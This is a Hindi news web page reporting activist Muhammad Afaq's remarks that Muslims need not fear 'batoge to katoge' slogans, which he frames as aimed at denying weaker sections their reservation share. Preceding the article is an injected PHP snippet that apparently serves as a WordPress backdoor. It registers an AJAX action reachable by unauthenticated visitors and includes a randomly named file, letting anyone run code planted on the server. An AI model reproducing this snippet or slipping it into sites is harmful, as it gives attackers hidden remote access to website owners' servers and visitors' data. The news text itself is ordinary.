if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }मुस्लिमों को बटोगे तो कटोगे जैसे बयानों से डरने की जरूरत नहीं- मुहम्मद आफ़ाक़ - Current Media

मुस्लिमों को बटोगे तो कटोगे जैसे बयानों से डरने की जरूरत नहीं- मुहम्मद आफ़ाक़

लखनऊ। राष्ट्रीय सामाजिक कार्य कर्ता संगठन के संयोजक मुहम्मद आफ़ाक़ ने कहा कि आज कुछ सांप्रदायिक ताकतें अपनी गलतबयानी के जरिए हमारे देश की शांति और सद्भाव को बाधित करने की कोशिश कर रही हैं। बटोगे तो कटोगे जैसे बयानों से मुसलमानों को घबराने की जरूरत नहीं है क्योंकि ये शब्द मुसलमानों के लिए नहीं बल्कि दलितों, पिछड़ों, आदिवासियों, हर कमजोर वर्ग के लिए दिए जा रहे हैं ताकि उन्हें उनकी जनसंख्या के आधार पर आरक्षण न मिल सके। उन्होंने कहा कि केवल मुसलमानों को ही नहीं, बल्कि संविधान में विश्वास करने वाले हर भारतीय को, चाहे वह किसी भी धर्म का हो, अपनी एकता और शांति बनाए रखते हुए इन जुमलों का जवाब देना चाहिए। हम न कभी बंटे थे और न कभी बंटेंगे, लेकिन इतिहास गवाह है कि देश की आजादी के लिए हम जरूर कटे और अब भी हिंदुस्तान की शांति और व्यवस्था बनाए रखने के लिए अपनी जान देने को तैयार हैं । और अब भी कटते हैं . उन्होंने कहा कि अगर हमारा देश बंट गया होता तो हमें अंग्रेजों से आजादी नहीं मिलती।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …